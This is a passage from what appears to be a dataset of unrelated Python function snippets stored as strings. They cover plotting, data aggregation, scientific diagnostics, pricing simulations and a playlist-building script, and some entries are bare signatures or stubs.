\"@affinity_cognitive = \"\n \"@affinity_cog_slot x \"\n \"@affinity_cog_task\"),\n (\"task_id\", \"@task_id\"),\n (\"index\", \"$index\"),\n (\"(t,l)\", \"(@bottom, @left)\"),\n ]\n\n # [Bokeh] inverted axis range example:\n # https://groups.google.com/a/continuum.io/forum/#!topic/bokeh/CJAvppgQmKo\n yr = Range1d(start=22, end=6)\n # yr = Range1d(start=24.5, end=-0.5)\n xr = Range1d(start=-0.3, end=7.3)\n p = figure(plot_width=1000, plot_height=600, y_range=yr, x_range=xr,\n tooltips=TOOLTIPS,\n title=\"Calendar: {} to {}\".format(start_str, end_str))\n self.p = p\n output_file(\"calendar.html\")\n\n p.xaxis[0].axis_label = 'Weekday ({}-{})'.format(start_weekday_str,\n end_weekday_str)\n p.yaxis[0].axis_label = 'Hour (7AM-9:30PM)'\n\n # Replace default yaxis so that each hour is displayed\n p.yaxis[0].ticker.desired_num_ticks = int(tutil.HOURS_PER_DAY)\n p.yaxis[0].ticker.num_minor_ticks = 4\n p.xaxis[0].ticker.num_minor_ticks = 0\n\n # Display task allocation as colored rectangles\n p.quad(top='top', bottom='bottom', left='left', right='right',\n color='colors', fill_alpha=0.7, line_alpha=0.5, source=source1)\n\n # Pre-process task names for display (no repeats, abbreviated names)\n # FIXME(cathywu) currently assumes that y is in time order, which may\n # not be the case when more task types are incorporated\n task_display = []\n curr_task = \"\"\n for name in task_names:\n if name == curr_task:\n task_display.append(\"\")\n else:\n curr_task = name\n task_display.append(name)\n data2 = data_tooltips.copy()\n data2.update(dict(\n x=left,\n y=top,\n # abbreviated version of task\n task=[k[:19] for k in task_display],\n ))\n source2 = ColumnDataSource(data=data2)\n\n # Annotate rectangles with task name\n # [Bokeh] Text properties:\n # https://bokeh.pydata.org/en/latest/docs/user_guide/styling.html#text-properties\n labels = LabelSet(x='x', y='y', text='task', level='glyph', x_offset=3,\n y_offset=-1, source=source2, text_font_size='7pt',\n render_mode='canvas')\n p.add_layout(labels)\n\n # Display cognitive affinity as rectangle to the right of the task\n colors_affinity = np.array(\n np.array(affinity_cognitive) * (NUM_AFFINITY - 1), dtype=int)\n colors_affinity = [COLORS_AFFINITY[NUM_AFFINITY - 1 - i] for i in\n colors_affinity.tolist()]\n data5 = data_tooltips.copy()\n data5.update(dict(\n top=(np.array(top) - 0.05).tolist(),\n bottom=(np.array(bottom) + 0.05).tolist(),\n left=(np.array(right) + 0.12).tolist(),\n right=(np.array(right) + 0.2).tolist(),\n colors=colors_affinity,\n ))\n source5 = ColumnDataSource(data=data5)\n p.quad(top='top', bottom='bottom', left='left', right='right',\n color='colors', source=source5)\n\n # Display willpower balance as rectangle to the right of the task\n colors_will = np.minimum(willpower_cumulative, 2)\n colors_will = np.maximum(colors_will, -2)\n colors_will += 2\n colors_will = np.array(colors_will / 4 * (NUM_WILL - 1), dtype=int)\n colors_will = [COLORS_WILL[i] for i in colors_will.tolist()]\n data6 = data_tooltips.copy()\n data6.update(dict(\n top=top,\n bottom=bottom,\n left=np.array(right) + 0.02,\n right=(np.array(right) + 0.1).tolist(),\n colors=colors_will,\n ))\n source6 = ColumnDataSource(data=data6)\n p.quad(top='top', bottom='bottom', left='left', right='right',\n color='colors', source=source6)\n\n # Display categories as a colored line on the left\n # TODO(cathywu) currently displays only the \"first\" category,\n # add support for more categories\n xs = []\n ys = []\n for y0, y1, x in zip(top, bottom, left):\n xs.append([x, x])\n ys.append([y0, y1])\n colors_cat = [COLORS_CAT[cat_ids[0] % len(COLORS_CAT)] for cat_ids in\n category_ids]\n data3 = data_tooltips.copy()\n data3.update(dict(\n xs=xs,\n ys=ys,\n colors=colors_cat,\n ))\n source3 = ColumnDataSource(data=data3)\n p.multi_line(xs='xs', ys='ys', color='colors', line_width=4,\n source=source3)\n\n # Annotate columns with day of the week\n data4 = data_tooltips.copy()\n data4.update(dict(\n x=[k + 0.1 for k in range(tutil.LOOKAHEAD)],\n y=[6.75 for _ in range(tutil.LOOKAHEAD)],\n weekday=[(c.START + timedelta(k)).strftime(\"%A\") for k in\n range(tutil.LOOKAHEAD)],\n ))\n source4 = ColumnDataSource(data=data4)\n labels2 = LabelSet(x='x', y='y', text='weekday', level='glyph',\n x_offset=3, y_offset=-1, source=source4,\n text_font_size='10pt', render_mode='canvas')\n p.add_layout(labels2)\n\n show(p)", "def handle_series_over(self, stats):\n #############################\n #\n #\n # YOUR CODE HERE\n #\n #\n #############################\n print(\"Series ended, these are the stats:\")\n print(str(stats))", "def on_task_output(self, task, config):\n series = {}\n movies = {}\n for entry in task.accepted:\n if all(field in entry for field in ['tvdb_id', 'series_name', 'series_season', 'series_episode']):\n eid = str(entry['tvdb_id'])\n sno = str(entry['series_season'])\n eno = entry['series_episode']\n show = series[eid] if eid in series else {'name': entry['series_name'], 'seasons': {}}\n if not sno in show['seasons']:\n show['seasons'][sno] = []\n if not eno in show['seasons'][sno]:\n show['seasons'][sno].append(eno)\n elif all(field in entry for field in ['imdb_id', 'movie_name']):\n movies[entry['imdb_id']] = entry['movie_name']\n if series:\n for eid, show in series.items():\n dest = os.path.join(config, 'series.watched.%s.json' % eid)\n data = {'name': show['name'], 'rating': 5}\n if os.path.exists(dest):\n with open(dest, 'r') as f:\n data = json.load(f)\n for season, episodes in show['seasons'].items():\n lst = data[season] if season in data else []\n data[season] = list(set(lst + episodes))\n text = json.dumps(data, sort_keys=True, indent=4, separators=(',', ': '))\n with open(dest, 'w') as f:\n f.write(text)\n self.log.info('Added watched episodes to Uoccin')\n if movies:\n dest = os.path.join(config, 'movies.watched.json')\n data = {}\n if os.path.exists(dest):\n with open(dest, 'r') as f:\n data = json.load(f)\n n = 0\n for eid, name in movies.items():\n if not eid in data:\n data[eid] = {'name': name, 'rating': 5}\n n += 1\n if n > 0:\n text = json.dumps(data, sort_keys=True, indent=4, separators=(',', ': '))\n with open(dest, 'w') as f:\n f.write(text)\n self.log.info('Added watched movies to Uoccin')", "def gather_data_from_multiple_runs(folder_path, runs, dataset=\"test\", tag='train/cross_entropy'):\n\n series = []\n for run in runs:\n path = os.path.join(folder_path,run,dataset)\n steps,values = extract_from_all_eventfiles(path, tag)\n print(\"run: {} extracted {} values\".format(run,len(values))) \n\n if len(values) > 0:\n\n s = pd.Series(data=values, index=steps,name=run).sort_index()\n # drop duplicates\n s = s[~s.index.duplicated(keep='last')]\n\n #.drop_duplicates(keep='last')\n series.append(s)\n \n return pd.concat(series,axis=1,join=\"outer\")", "def executor(self):", "def start_processing(self):", "def docker_worker():", "def create_series(self):\n series = []\n for timeline_object in self.timeline['results']:\n count = timeline_object[\"count\"]\n series.insert(0, count)\n self.query_total = self.query_total + count\n label = self.query[0:30]\n if len(self.query) > 30:\n label = label + \"...\"\n label = label + \" (\" + str(self.query_total) + \")\"\n series.insert(0, label)\n return series", "def run_stage_loop(cls, _opts, tests_results, put_next_stage):\n for _, result in tests_results:\n put_next_stage(result)", "def _fill_moment_results(self):\n toprocess = [('stock_tom', self.c_stock, 2),\n ('stock_woody', self.c_stock, 3),\n ('stock_non_woody', self.c_stock, 4),\n ('stock_acid', self.c_stock, 5),\n ('stock_water', self.c_stock, 6),\n ('stock_ethanol', self.c_stock, 7),\n ('stock_non_soluble', self.c_stock, 8),\n ('stock_humus', self.c_stock, 9),\n ('change_tom', self.c_change, 2),\n ('change_woody', self.c_change, 3),\n ('change_non_woody', self.c_change, 4),\n ('change_acid', self.c_change, 5),\n ('change_water', self.c_change, 6),\n ('change_ethanol', self.c_change, 7),\n ('change_non_soluble', self.c_change, 8),\n ('change_humus', self.c_change, 9),\n ('co2', self.co2_yield, 2)]\n for (resto, dataarr, dataind) in toprocess:\n # filter time steps\n ts = numpy.unique(dataarr[:,1])\n # extract data for the timestep\n for timestep in ts:\n ind = numpy.where(dataarr[:,1]==timestep)\n mean = stats.mean(dataarr[ind[0], dataind])\n mode_res = stats.mode(dataarr[ind[0], dataind])\n mode = mode_res[0]\n var = stats.var(dataarr[ind[0], dataind])\n skew = stats.skew(dataarr[ind[0], dataind])\n kurtosis = stats.kurtosis(dataarr[ind[0], dataind])\n if var>0.0:\n sd2 = 2 * math.sqrt(var)\n else:\n sd2 = var\n res = [[timestep, mean, mode[0], var, skew, kurtosis,\n mean - sd2, mean + sd2]]\n if resto=='stock_tom':\n self.md.stock_tom = numpy.append(self.md.stock_tom,\n res, axis=0)\n elif resto=='stock_woody':\n self.md.stock_woody = numpy.append(self.md.stock_woody,\n res, axis=0)\n elif resto=='stock_non_woody':\n self.md.stock_non_woody = numpy.append(\\\n self.md.stock_non_woody, res, axis=0)\n elif resto=='stock_acid':\n self.md.stock_acid = numpy.append(self.md.stock_acid,\n res, axis=0)\n elif resto=='stock_water':\n self.md.stock_water = numpy.append(self.md.stock_water,\n res, axis=0)\n elif resto=='stock_ethanol':\n self.md.stock_ethanol = numpy.append(self.md.stock_ethanol,\n res, axis=0)\n elif resto=='stock_non_soluble':\n self.md.stock_non_soluble= numpy.append(\n self.md.stock_non_soluble, res, axis=0)\n elif resto=='stock_humus':\n self.md.stock_humus = numpy.append(self.md.stock_humus,\n res, axis=0)\n elif resto=='change_tom':\n self.md.change_tom = numpy.append(self.md.change_tom,\n res, axis=0)\n elif resto=='change_woody':\n self.md.change_woody = numpy.append(self.md.change_woody,\n res, axis=0)\n elif resto=='change_non_woody':\n self.md.change_non_woody = numpy.append(\\\n self.md.change_non_woody, res, axis=0)\n elif resto=='change_acid':\n self.md.change_acid = numpy.append(self.md.change_acid,\n res, axis=0)\n elif resto=='change_water':\n self.md.change_water = numpy.append(self.md.change_water,\n res, axis=0)\n elif resto=='change_ethanol':\n self.md.change_ethanol = numpy.append(\n self.md.change_ethanol, res, axis=0)\n elif resto=='change_non_soluble':\n self.md.change_non_soluble=numpy.append(\n self.md.change_non_soluble, res, axis=0)\n elif resto=='change_humus':\n self.md.change_humus = numpy.append(self.md.change_humus,\n res, axis=0)\n elif resto=='co2':\n self.md.co2 = numpy.append(self.md.co2, res, axis=0)", "def main() -> None:\n\n task_results = {}\n for task in (Task.SINGLE_SEQUENCE, Task.MULTI_SEQUENCE):\n task_results[task] = []\n for category in CO3D_CATEGORIES[: (20 if task == Task.SINGLE_SEQUENCE else 10)]:\n for single_sequence_id in (\n (0, 1) if task == Task.SINGLE_SEQUENCE else (None,)\n ):\n category_result = evaluate_dbir_for_category(\n category, task=task, single_sequence_id=single_sequence_id\n )\n print(\"\")\n print(\n f\"Results for task={task}; category={category};\"\n + (\n f\" sequence={single_sequence_id}:\"\n if single_sequence_id is not None\n else \":\"\n )\n )\n pretty_print_nvs_metrics(category_result)\n print(\"\")\n\n task_results[task].append(category_result)\n _print_aggregate_results(task, task_results)\n\n for task in task_results:\n _print_aggregate_results(task, task_results)", "def runMetrics(self, dataPixel):\n\n resdict = {}\n # run the metrics on these data\n if len(dataPixel) <= 5:\n return\n for metric in self.metricList:\n resdict[metric.name] = metric.run(\n season(dataPixel.to_records(index=False)))\n # print('running',len(resdict[metric.name]))\n\n # concatenate the results\n for key in self.resfi.keys():\n if resdict[key] is not None:\n self.resfi[key] = pd.concat((self.resfi[key], resdict[key]))", "def aggregate_results(self):\n\n raise NotImplementedError", "def run(self, voxels, entry='all', freq_raw=False):\n\n # Note. in this case we are processing all raw data into the data \n # attribute, so despite having multiple raw FIDs, we are really \n # only processing one voxel, so no for loop\n\n # local reference to input data\n self.raw = self._dataset.get_source_data('prep')\n\n # Choose voxel - for saving result for current single voxel plot\n self.voxel = voxels[0]\n\n # select the chain processing functor based on the entry point\n if entry == 'all':\n funct_fidsum_wbnaa.do_processing_all(self)\n else:\n print('oooops!')\n\n # save data and parameter results into the Block results arrays\n self._block.data[0,0,0,:] = self.time_summed_offset.copy()\n \n # Return values specific to calling Tab that contains this Block.Chain\n # Used to update its self.view (plot_panel_spectrum object).\n\n plot_results = { 'freq_current' : self.freq_current.copy(),\n 'freq_summed' : self.freq_summed.copy(),\n 'freq_summed_offset' : self.freq_summed_offset.copy() }\n \n return plot_results", "def run(self):\n self.assign_inputs()\n self.execute()\n self.collect_outputs()", "def run(self) -> list:\n logger.debug('Fetching date %s', self._day.strftime('%Y/%m/%d'))\n \n regions = [r() for r in regions_list]\n air_quality = list()\n \n # fetch air quality of each region\n for r in regions:\n r.fetch_air_quality(self._day)\n \n # gather results from all regions\n for r in regions:\n # wait until region has fetched his data\n r.wait_for_quality()\n logging.info('Fetched region:%s for day:%s', r.name, self._day)\n air_quality.append({\n 'name': r.name,\n 'provinces': [\n {'name': x.name, 'short': x.short_name, 'quality': x.quality.asdict()} \n for x in r.provinces]\n })\n\n self._fetcher.fetched_result(self._day, air_quality)", "def run_diagnostics(self, env, scomm):\n super(modelTimeseries, self).run_diagnostics(env, scomm)\n scomm.sync()\n\n # setup some global variables\n requested_plots = list()\n local_requested_plots = list()\n\n # define the templatePath for all tasks\n templatePath = '{0}/diagnostics/diagnostics/ocn/Templates'.format(env['POSTPROCESS_PATH']) \n\n # all the plot module XML vars start with MVO_PM_ need to strip that off\n for key, value in env.iteritems():\n if (re.search(\"\\AMTS_PM_\", key) and value.upper() in ['T','TRUE']):\n k = key[4:] \n requested_plots.append(k)\n\n scomm.sync()\n print('model timeseries - after scomm.sync requested_plots = {0}'.format(requested_plots))\n\n if scomm.is_manager():\n print('model timeseries - User requested plot modules:')\n for plot in requested_plots:\n print(' {0}'.format(plot))\n\n print('model timeseries - Creating plot html header')\n templateLoader = jinja2.FileSystemLoader( searchpath=templatePath )\n templateEnv = jinja2.Environment( loader=templateLoader )\n \n template_file = 'model_timeseries.tmpl'\n template = templateEnv.get_template( template_file )\n \n # get the current datatime string for the template\n now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n # test the template variables\n templateVars = { 'casename' : env['CASE'],\n 'tagname' : env['CESM_TAG'],\n 'username' : env['USER_NAME'],\n 'start_year' : env['TSERIES_YEAR0'],\n 'stop_year' : env['TSERIES_YEAR1'],\n 'today': now\n }\n\n print('model timeseries - Rendering plot html header')\n plot_html = template.render( templateVars )\n\n scomm.sync()\n\n print('model timeseries - Partition requested plots')\n # partition requested plots to all tasks\n local_requested_plots = scomm.partition(requested_plots, func=partition.EqualStride(), involved=True)\n scomm.sync()\n\n for requested_plot in local_requested_plots:\n try:\n plot = ocn_diags_plot_factory.oceanDiagnosticPlotFactory('timeseries', requested_plot)\n\n print('model timeseries - Checking prerequisite for {0} on rank {1}'.format(plot.__class__.__name__, scomm.get_rank()))\n plot.check_prerequisites(env)\n\n print('model timeseries - Generating plots for {0} on rank {1}'.format(plot.__class__.__name__, scomm.get_rank()))\n plot.generate_plots(env)\n\n print('model timeseries - Converting plots for {0} on rank {1}'.format(plot.__class__.__name__, scomm.get_rank()))\n plot.convert_plots(env['WORKDIR'], env['IMAGEFORMAT'])\n\n except RuntimeError as e:\n # unrecoverable error, bail!\n print(\"model timeseries - Skipped '{0}' and continuing!\".format(requested_plot))\n print(e)\n\n scomm.sync()\n\n # initialize OrderedDict with plot_order list entries as key\n html_order = collections.OrderedDict()\n for plot in env['MTS_PLOT_ORDER'].split():\n html_order[plot] = '';\n\n if scomm.is_manager():\n for plot in env['MTS_PLOT_ORDER'].split():\n if plot in requested_plots:\n print('calling get_html for plot = {0}'.format(plot))\n plot_obj = ocn_diags_plot_factory.oceanDiagnosticPlotFactory('timeseries', plot)\n shortname, html = plot_obj.get_html(env['WORKDIR'], templatePath, env['IMAGEFORMAT'])\n html_order[shortname] = html\n\n for k, v in html_order.iteritems():\n print('Adding html for plot = {0}'.format(k))\n plot_html += v\n\n print('model timeseries - Adding footer html')\n with open('{0}/footer.tmpl'.format(templatePath), 'r') as tmpl:\n plot_html += tmpl.read()\n\n print('model timeseries - Writing plot index.html')\n with open( '{0}/index.html'.format(env['WORKDIR']), 'w') as index:\n index.write(plot_html)\n\n print('**************************************************************************')\n print('Successfully completed generating ocean diagnostics model timeseries plots')\n print('**************************************************************************')\n\n scomm.sync()\n\n # append the web_dir location to the env\n key = 'OCNDIAG_WEBDIR_{0}'.format(self._name)\n env[key] = env['WORKDIR']\n\n return env", "def run(self):\n # pylint: disable=too-many-locals\n loop_start = time.clock()\n partitions = []\n for item in self._results:\n partitions.append(\n Partition(item.name, item.dataframe, self.PARTITION_SIZE)\n )\n if item.name == self._primary_dataset:\n primary_dataset = partitions[-1]\n\n index = 0\n while index < self.PARTITION_SIZE:\n merge_sets = []\n combination = ['\\033[1m{0}\\033[0m'.format(self._mappings[self._primary_dataset])]\n for partition in partitions:\n if partition.name != self._primary_dataset:\n merge_sets.append({'name': partition.name, 'data': partition.next()})\n combination.append(self._mappings[partition.name])\n\n Logger().info(\n 'Running data extraction. Index {0} of {1} partitions, (combination: {2}, queries: {3})'.format(\n index,\n self.PARTITION_SIZE,\n ''.join(combination),\n len(self._queries)\n )\n )\n\n for size in range(self.PARTITION_SIZE):\n self._running = []\n q_start = time.clock()\n merge_table = self.merge(\n merge_sets + [{'name': primary_dataset.name, 'data': primary_dataset.next()}]\n )\n m_end = '{0:.2f}'.format(float(time.clock() - q_start))\n Logger().debug(\n 'Combination {0} merge table completed in {1} seconds ({2} rows)'.format(\n ''.join(combination),\n m_end,\n len(merge_table.index)\n )\n )\n for query in self._queries:\n self._running.append(\n DataThreader(merge_table, query, self._unique_columns)\n )\n\n self.monitor()\n times = [item.duration for item in self._running]\n message = '{4}\\n Combination {0}, Index {5}/{1}'\n message += ', merge_table size: {2}.\\n Average time per query {3}'\n Logger().debug(\n message.format(\n ''.join(combination),\n index,\n len(merge_table.index),\n times,\n [len(query.results.index) for query in self._queries],\n size\n )\n )\n del times\n del merge_table\n del self._running\n\n end_time = math.floor(time.clock() - loop_start)\n Logger().info('=========================================================================================')\n Logger().info(\n 'Completed partition {0} in {1} seconds. {2} queries, combination: {3}'.format(\n index,\n end_time,\n len(self._queries),\n ''.join(combination)\n )\n )\n Logger().info('=========================================================================================')\n primary_dataset.reset()\n index += 1\n\n Logger().info('Completed data extraction')\n self._complete = True", "def _publish_results(self):\n\n doc = Document()\n date = get_stamp()\n\n labels = ExperimentTemplateBase.parameters_to_string(self._topology_parameters_list)\n\n title = 'Mutual Information labels vs ' + self._experiment_name\n self.plot_save(title,\n self._mutual_info,\n self._baseline_mutual_info,\n 'Norm. mutual information',\n labels, date, self._docs_folder, doc)\n\n title = 'Weak classifier accuracy labels vs ' + self._experiment_name\n self.plot_save(title,\n self._classifier_accuracy,\n self._baseline_classifier_accuracy,\n 'Classifier accuracy',\n labels, date, self._docs_folder, doc) #, smoothing_size=3)\n\n title = 'average delta'\n f = plot_multiple_runs(\n self._different_steps[0], # here the X axes are identical\n self._average_delta,\n title=title,\n ylabel='log(delta)',\n xlabel='steps',\n labels=labels\n )\n add_fig_to_doc(f, path.join(self._docs_folder, title), doc)\n\n title = 'average boosting duration'\n f = plot_multiple_runs(\n self._different_steps[0],\n self._average_boosting_dur,\n title=title,\n ylabel='duration',\n xlabel='steps',\n labels=labels\n )\n add_fig_to_doc(f, path.join(self._docs_folder, title), doc)\n\n doc.write_file(path.join(self._docs_folder, to_safe_name(self._complete_name() + date + \".html\")))\n\n print('done')", "def _fetch_daily_internal(delta, swarming, process, endpoint, start, end, state,\n tags, parallel):\n out = {}\n with threading_utils.ThreadPool(1, parallel, 0) as pool:\n while start < end:\n cmd = _get_cmd(swarming, endpoint, _get_epoch(start),\n _get_epoch(start + delta), state, tags)\n pool.add_task(0, _run_json, start.strftime('%Y-%m-%d'), process, cmd)\n start += delta\n for k, v in pool.iter_results():\n sys.stdout.write('.')\n sys.stdout.flush()\n out[k] = v\n print('')\n return out", "def iterate_days(results_queue, idx=0):\n # Declaration of learners and results' vectors\n ucb1_learner = UCB1Learner(len(prices))\n tsgauss_learner = TSLearnerGauss(len(prices))\n vector_daily_price_ucb1_loc = []\n vector_daily_revenue_ucb1_loc = []\n vector_daily_price_ts_loc = []\n vector_daily_revenue_ts_loc = []\n\n print('Starting execution ' + str(idx))\n\n # For every day:\n for t in range(T):\n if t % 20 == 0:\n log(\"Iteration day: {:3d} - execution: {:3d}\".format(t, idx))\n # Get new users in the day t and their costs\n [new_user_1, new_user_2, new_user_3] = env.get_all_new_users_daily(bids[0])\n new_users = [new_user_1, new_user_2, new_user_3]\n [cost1, cost2, cost3] = env.get_all_cost_per_click(bids[0])\n cost = [cost1, cost2, cost3]\n\n # Get the total cost\n total_cost = 0\n for user in range(len(new_users)):\n total_cost += new_users[user] * cost[user]\n\n # Choose the arm and thus the price for UCB1\n daily_arm_ucb1 = ucb1_learner.pull_arm()\n daily_price_ucb1 = prices[daily_arm_ucb1]\n vector_daily_price_ucb1_loc.append(daily_price_ucb1)\n\n # Choose the arm and thus the price for Thomson Sampling\n daily_arm_ts = tsgauss_learner.pull_arm()\n daily_price_ts = prices[daily_arm_ts]\n vector_daily_price_ts_loc.append(daily_price_ts)\n\n # Calculate the number of bought items\n daily_bought_items_per_class_ucb1 = [0, 0, 0]\n daily_bought_items_per_class_ts = [0, 0, 0]\n\n for user in range(len(new_users)):\n for c in range(new_users[user]):\n daily_bought_items_per_class_ucb1[user] += env.buy(daily_price_ucb1, user + 1)\n daily_bought_items_per_class_ts[user] += env.buy(daily_price_ts, user + 1)\n\n # Sum up the n. of bought items\n daily_bought_items_ucb1 = sum(daily_bought_items_per_class_ucb1)\n daily_bought_items_ts = sum(daily_bought_items_per_class_ts)\n\n # Calculate the revenue\n daily_revenue_ucb1 = daily_bought_items_ucb1 * env.get_margin(daily_price_ucb1) - total_cost\n daily_revenue_ts = daily_bought_items_ts * env.get_margin(daily_price_ts) - total_cost\n\n # Add to the vector the daily revenue\n vector_daily_revenue_ucb1_loc.append(daily_revenue_ucb1)\n vector_daily_revenue_ts_loc.append(daily_revenue_ts)\n\n # Get delayed rewards\n next_30_days = [0] * 30\n for user in range(1, 4):\n next_30_days = list(\n map(add, next_30_days, env.get_next_30_days(daily_bought_items_per_class_ucb1[user - 1], daily_price_ucb1,\n user)))\n\n ucb1_learner.update_observations(daily_arm_ucb1, daily_revenue_ucb1, next_30_days)\n\n # Get delayed rewards\n next_30_days = [0] * 30\n for user in range(1, 4):\n next_30_days = list(\n map(add, next_30_days, env.get_next_30_days(daily_bought_items_per_class_ts[user - 1], daily_price_ts,\n user)))\n tsgauss_learner.update_observations(daily_arm_ts, daily_revenue_ts, next_30_days)\n\n if plot_l_t == True and t>=29:\n plot_learned_curve(tsgauss_learner.mu, tsgauss_learner.tau, real, tsgauss_learner.n_pulled_arms, plots_folder, t)\n\n print('Ending execution ' + str(idx))\n\n # put results in the given queue\n results_queue.put((ucb1_learner.collected_rewards, tsgauss_learner.collected_rewards, vector_daily_price_ucb1_loc,\n vector_daily_revenue_ucb1_loc, vector_daily_price_ts_loc, vector_daily_revenue_ts_loc, tsgauss_learner.mu, tsgauss_learner.tau, tsgauss_learner.n_pulled_arms))", "def execution(path_channel_data_base_json, path_playlist_ids_json, latest_date, oldest_date, api_service,\n selected_category, short_vid_index, long_vid_index, min_dur_long_vid=10, delay=True):\n today_date = datetime.today()\n\n log = f\"Date of execution: {today_date:%Y-%m-%d %H:%M:%S}\\n\" \\\n f\"Latest Date: {latest_date:%Y-%m-%d %H:%M:%S}\\n\" \\\n f\"Oldest Date: {oldest_date:%Y-%m-%d %H:%M:%S}\\n\\n\"\n\n print(log)\n\n music_channels = get_channel_list(path_channel_data_base_json, category=selected_category)\n playlist_ids = read_json(path_playlist_ids_json)\n\n all_vid = get_all_videos(music_channels, latest_date=latest_date, oldest_date=oldest_date, api_service=api_service)\n log += f'{all_vid[\"log_str\"]}\\n'\n\n duration_list = api_get_videos_duration(all_vid[\"all_video_ids\"], api_service)\n\n duration_filter_dict = duration_filter(duration_list, minute_threshold=min_dur_long_vid)\n log += f'{duration_filter_dict[\"logs\"]}\\n'\n\n print(\"Adding videos into playlists...\\n\")\n log += \"Adding videos into playlists...\\n\\n\"\n\n log_short_vid_text = api_add_to_playlist(playlist_ids[short_vid_index], duration_filter_dict[\"short_videos\"],\n api_service, delay=delay)\n log += f'{log_short_vid_text}\\n'\n\n log_long_vid_text = api_add_to_playlist(playlist_ids[long_vid_index], duration_filter_dict[\"long_videos\"],\n api_service, delay=delay)\n log += f'{log_long_vid_text}\\n'\n\n print(\"- ALL DONE! -\\n\")\n log += \"- ALL DONE! -\\n\"\n\n log += f\"\\n{clean_logs('../Logs')}\"\n\n with open(f'../Logs/Log_{today_date:%Y-%m-%d_%H.%M.%S}.txt', 'w', encoding=\"utf-8\") as file:\n file.write(log)\n\n sleep(5)\n\n webbrowser.open(f\"https://www.youtube.com/playlist?list={playlist_ids[short_vid_index]}\")\n webbrowser.open(f\"https://www.youtube.com/playlist?list={playlist_ids[long_vid_index]}\")", "def _timeseries_calc(ifg_paths, params, vcmt, tiles, preread_ifgs):\n if params[cf.TIME_SERIES_CAL] == 0:\n log.info('Time Series Calculation not required')\n return\n\n if params[cf.TIME_SERIES_METHOD] == 1:\n log.info('Calculating time series using Laplacian Smoothing method')\n elif params[cf.TIME_SERIES_METHOD] == 2:\n log.info('Calculating time series using SVD method')\n\n output_dir = params[cf.TMPDIR]\n total_tiles = len(tiles)\n process_tiles = mpiops.array_split(tiles)\n for t in process_tiles:\n log.debug(\"Calculating time series for tile \"+str(t.index)+\" out of \"+str(total_tiles))\n ifg_parts = [shared.IfgPart(p, t, preread_ifgs, params) for p in ifg_paths]\n mst_tile = np.load(os.path.join(output_dir, 'mst_mat_{}.npy'.format(t.index)))\n res = timeseries.time_series(ifg_parts, params, vcmt, mst_tile)\n tsincr, tscum, _ = res\n np.save(file=os.path.join(output_dir, 'tsincr_{}.npy'.format(t.index)), arr=tsincr)\n np.save(file=os.path.join(output_dir, 'tscuml_{}.npy'.format(t.index)), arr=tscum)\n mpiops.comm.barrier()\n log.debug(\"Finished timeseries calc!\")", "def main(self, model=None):\n result = pd.DataFrame()\n if model is None:\n model = Model.default()\n for season in [2011, 2012, 2013]:\n print(season)\n r = Runner(Season(season), model)\n current = r.run()\n result = result.append(current)\n return result", "def installs_series(request, addon, group, start, end, format):\n date_range = check_series_params_or_404(group, start, end, format)\n check_stats_permission(request, addon)\n\n series = get_series(Installed, addon=addon.id, date__range=date_range)\n\n if format == 'csv':\n return render_csv(request, addon, series, ['date', 'count'])\n elif format == 'json':\n return render_json(request, addon, series)", "def _run(self, index_list: List[np.ndarray]) -> Iterator[XData]:\n da_it = task_list(index_list, IdReader(), self.worker, self.nworkers)\n xdata_it = (dataarrays_to_xdata(d, self.meta) for d in da_it)\n return xdata_it", "def compute(self):\n self.find_n()\n\n # call hotspot field plots\n for scenario in self.scenarios:\n fields_dict = {}\n ancestor_files = []\n for filename in io.get_all_ancestor_files(self.cfg,\n pattern='hotspot_*.nc'):\n key = os.path.basename(os.path.dirname(filename))\n splitname = os.path.basename(filename).split(\"_\")\n if key.split(\"_\")[-1] == scenario:\n fields_dict[(\n f\"{splitname[-1].split('.nc')[0]}_\"\n f\"{splitname[1]}_{key}\")] = iris.load_cube(filename)\n ancestor_files.append(filename)\n fields_dict[\"scenario\"] = scenario\n fields_dict[\"ancestors\"] = ancestor_files\n self.hotspot_fields_plot(fields_dict)\n\n # call scatter plots\n for season in self.seasons:\n timeseries_dict = {\"large_scale\": {}, \"regional\": {}}\n for region, value in timeseries_dict.items():\n for filename in io.get_all_ancestor_files(\n self.cfg,\n pattern=f'rolling_mean_{region}_{season}.nc'):\n value[os.path.basename(os.path.dirname(filename))] = (\n iris.load_cube(filename))\n value[os.path.basename(\n os.path.dirname(filename))] = (filename)\n for var_combination in self.var_combinations:\n self.timeseries_scatter_plot(deepcopy(timeseries_dict), season,\n var_combination)", "def _run_computation(self):\n with self.swap(stats_jobs_continuous.StatisticsAggregator,\n 'get_statistics', self._mock_get_statistics):\n ModifiedUserImpactAggregator.start_computation()\n self.process_and_flush_pending_tasks()", "def zonal_stats_workflow():\n save_as = \"C:/Users/ginge/Documents/NatCap/GIS_local/USFS/replicate_4th_draft_12.4.18/summary/monthly_quickflow.csv\"\n scenario_dict = {\n 'pre-decline': \"C:/Users/ginge/Documents/NatCap/GIS_local/USFS/replicate_4th_draft_12.4.18/pre_decline\",\n 'post-decline': \"C:/Users/ginge/Documents/NatCap/GIS_local/USFS/replicate_4th_draft_12.4.18/post_decline\",\n }\n df_list = []\n for scenario in scenario_dict.iterkeys():\n results_dict = {\n 'scenario': [],\n 'month': [],\n 'sum_quickflow': [],\n }\n folder = scenario_dict[scenario]\n aoi_shp = os.path.join(folder, 'aggregated_results.shp')\n for month in xrange(1, 13):\n qf_raster = os.path.join(\n folder, 'intermediate_outputs', 'qf_{}.tif'.format(month))\n zonal_stats = pygeoprocessing.zonal_statistics(\n (qf_raster, 1), aoi_shp)\n sum_QF = zonal_stats[0]['sum']\n results_dict['scenario'].append(scenario)\n results_dict['month'].append(month)\n results_dict['sum_quickflow'].append(sum_QF)\n results_df = pandas.DataFrame(data=results_dict)\n df_list.append(results_df)\n combined_list = pandas.concat(df_list)\n combined_list.to_csv(save_as, index=False)", "def execute(self):\n # Ensure a true no-op (in particular, we don't want to GET the feed) if\n # there are no Subtasks\n if not any([self._tx_by_uuid, self._common_tx.subtasks,\n self._post_exec]):\n LOG.info(_(\"FeedTask %s has no Subtasks; no-op execution.\"),\n self.name)\n return\n rets = {'wrapper_task_rets': {}}\n try:\n # Calling .wrapper_tasks will cause the feed to be fetched and\n # WrapperTasks to be replicated, if not already done. Only do this\n # if there exists at least one WrapperTask with Subtasks.\n # (NB: It is legal to have a FeedTask that *only* has post-execs.)\n if self._tx_by_uuid or self._common_tx.subtasks:\n pflow = tf_uf.Flow(\"%s_parallel_flow\" % self.name)\n pflow.add(*self.wrapper_tasks.values())\n # Execute the 